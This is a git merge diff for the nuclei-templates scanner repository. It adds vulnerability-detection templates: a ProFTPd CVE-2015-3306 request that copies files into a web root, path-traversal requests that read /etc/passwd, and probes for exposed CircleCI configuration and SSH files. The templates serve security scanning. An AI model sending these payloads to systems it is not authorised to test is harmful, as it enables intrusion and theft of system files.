Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
f343a4d311
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||||
| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 |
|
| cves | 237 | vulnerabilities | 105 | exposed-panels | 104 |
|
||||||
| exposures | 61 | technologies | 50 | misconfiguration | 54 |
|
| exposures | 63 | technologies | 50 | misconfiguration | 54 |
|
||||||
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
|
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
|
||||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||||
| helpers | 2 | takeovers | 1 | - | - |
|
| helpers | 2 | takeovers | 1 | - | - |
|
||||||
|
|
||||||
**75 directories, 712 files**.
|
**75 directories, 716 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -9,6 +9,7 @@ requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2015-3306
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ProFTPd RCE
|
||||||
|
author: pd-team
|
||||||
|
severity: high
|
||||||
|
reference: https://github.com/t0kx/exploit-CVE-2015-3306
|
||||||
|
tags: cve,cve2015,ftp,rce,network
|
||||||
|
|
||||||
|
network:
|
||||||
|
- inputs:
|
||||||
|
- data: "site cpfr /proc/self/cmdline\r\n"
|
||||||
|
read: 1024
|
||||||
|
- data: "site cpto /tmp/.{{randstr}}\r\n"
|
||||||
|
read: 1024
|
||||||
|
- data: "site cpfr /tmp/.{{randstr}}\r\n"
|
||||||
|
read: 1024
|
||||||
|
- data: "site cpto /var/www/html/{{randstr}}\r\n"
|
||||||
|
host:
|
||||||
|
- "{{Hostname}}:21"
|
||||||
|
|
||||||
|
read-size: 1024
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Copy successful"
|
||||||
|
part: raw
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: CVE-2018-18778
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: mini_httpd Path Traversal
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
|
||||||
|
tags: cve,cve2018,lfi
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |+
|
||||||
|
GET /etc/passwd HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Content-Length: 4
|
||||||
|
|
||||||
|
unsafe: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
|
@ -33,6 +33,7 @@ requests:
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||||
Upgrade-Insecure-Requests: 1
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -11,6 +11,7 @@ requests:
|
||||||
- "{{BaseURL}}/IdentityGuardSelfService/"
|
- "{{BaseURL}}/IdentityGuardSelfService/"
|
||||||
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
|
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
redirects: true
|
redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: circleci-config
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: circleci config.yml exposure
|
||||||
|
author: geeknik
|
||||||
|
severity: low
|
||||||
|
reference: https://circleci.com/docs/2.0/sample-config/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 3
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.circleci/config.yml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'regex("^version: ", body) && contains(body, "jobs:") == true'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: circleci-ssh-config
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: circleci ssh-config exposure
|
||||||
|
author: geeknik
|
||||||
|
severity: low
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 3
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.circleci/ssh-config"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Host"
|
||||||
|
- "HostName"
|
||||||
|
- "IdentityFile"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -46,8 +46,8 @@ requests:
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||||
Accept-Language: en-US,en;q=0.9
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
name: iis-scan
|
|
||||||
dsl:
|
dsl:
|
||||||
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
|
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"
|
||||||
|
|
|
@ -19,6 +19,7 @@ requests:
|
||||||
GET /testing-put.txt HTTP/1.1
|
GET /testing-put.txt HTTP/1.1
|
||||||
Content-Type: text/plain
|
Content-Type: text/plain
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
name: multi-req
|
name: multi-req
|
||||||
|
|
Loading…
Reference in New Issue